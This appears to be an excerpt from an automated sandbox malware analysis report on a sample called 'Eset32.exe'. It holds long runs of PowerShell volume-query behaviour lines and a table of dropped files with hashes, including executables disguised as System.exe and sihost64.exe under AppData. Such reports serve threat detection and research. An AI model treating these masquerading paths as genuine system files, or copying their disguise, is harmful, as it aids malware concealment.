Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows\System.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows\System.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows\System.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe VolumeInformation

ID:	596584
Product:	CloudBasic
Start time:	22:08:24
Start date:	24.03.2022
Sample:	Eset32.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	b405bf6533c047b1a47ceced3b42c23b
SHA1:	bbb321d380c3f9d17e49a9f2167234742e292e4d
SHA256:	5b35297b640271fea6e846f28d07852589f60ab88ee597c0e2eea68a5de3bec9
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\12.exe.log	ASCII text, with CRLF line terminators	55B1C358C76C36555547AB8BA39CB42E	63BD54BA7CB70FB481C8D625EBA24A5E2D6564F2	33367C74DE2EC5A5DE6FDAD331DCBF09EB0C8EA333708F7CD3C0228D8A466240
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log	ASCII text, with CRLF line terminators	55B1C358C76C36555547AB8BA39CB42E	63BD54BA7CB70FB481C8D625EBA24A5E2D6564F2	33367C74DE2EC5A5DE6FDAD331DCBF09EB0C8EA333708F7CD3C0228D8A466240
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	A30A545B73C738B58F7D7089B1C9FF63	2F4784CFB523E34E6492F67EF7A04C7A20F16872	2F1991061F8982C2AAB4D49CAF78BE84E1282EFED26BE6775989B0EC4C9464BC
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	C670369412C03F8FA7DBD5472B975480	1EABE685DDD1AB29F6BC8CE34AD8C7E51CCC0E20	EC2FED6FF59CE8D4D74B89B554CA364A470C45515C96D8C7E8FE76A0E5788BFB
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0yow3mvu.tj4.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ylat3fg.wsq.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44p5rcer.s4n.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aimqagfl.k3o.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gq1rjo0b.xw4.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcrj51io.qjc.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy5qikcs.t2u.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdo0e3x0.t1b.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb0bhm4m.q4d.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_st3h5wvp.0v4.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\1.exe	PE32 executable (console) Intel 80386, for MS Windows	D9F92868EEE8D3C8ECD29A7969419D29	0A74749DFCD4ECA403859431EBB18BA2A7E845BF	B7154023E4778AC19EE6885BF403BF20CE675EF4B87F816E379FA98293526BE3
C:\Users\user\AppData\Roaming\12.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	7ADD9A3AB1734828F756F2725C452C9A	8EDE7005B99E59AF98DA451FBA6AFCE13F3A5629	DAB7FDA27D80D645D5A709E59DD1AFE41A535885BC353C844077E570D051E763
C:\Users\user\AppData\Roaming\Windows\System.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	7ADD9A3AB1734828F756F2725C452C9A	8EDE7005B99E59AF98DA451FBA6AFCE13F3A5629	DAB7FDA27D80D645D5A709E59DD1AFE41A535885BC353C844077E570D051E763
C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	E2DD8887AEE175EF9BEFD87B2F6105B3	DFC0527E7425EF633DB3DB034E2E3DB8E09F9B28	C09D1684236D9CE1D7E0C1C14119B4DC84CBC841DA4F4FB84131AA0F367F38F1
C:\Users\user\Documents\20220324\PowerShell_transcript.841618.0_G0nLw0.20220324221054.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	2A07327783C8C059278FB8131A15BC86	72A793666AD245E17EE327066392AAB66F4A8578	428716E884350ADB02D14DC21BF1832BE3CFFEADC03F91889BE8EAC50B8F822C
C:\Users\user\Documents\20220324\PowerShell_transcript.841618.3pgwcPiq.20220324221049.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	F0330880F2F7BDF92334BE868A3E2B76	7FB360CC5173C1C87BA2A9D8B46733092212BE7D	579A82C295646CF09AD1D49D893B5AE26584C825202E65337B29778D9CEAA73E
C:\Users\user\Documents\20220324\PowerShell_transcript.841618.C+N4AHXZ.20220324221113.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	FD595612596392EF16B26200199439F4	06112F5363BFC9E636106AE33A263079CA122830	7495F81371E9D6D4316B38A94A66D63597C21ED48170B36D87E2643086D6528F
C:\Users\user\Documents\20220324\PowerShell_transcript.841618.LAWMVj_f.20220324221018.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	75A1F14AC41D6806DAA818318C905D78	BC191AECDC22CA7B0EA9EDCE1C630EA0413F03A1	469CD3329590793020ED92B36F3B62FEDCDB0C4281DB636C0FF0D31FFEC0EFEF
C:\Users\user\Documents\20220324\PowerShell_transcript.841618.sZdefLPX.20220324220950.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	96B72526B59BA604F3C8CEB114B96D15	DAA9D1365D4766A78CB16003EFDE94D9E9B8F786	E58278B16390EA93E36F7E0769530BB23666CBC8946916A3F0E2B768CBAE9C1A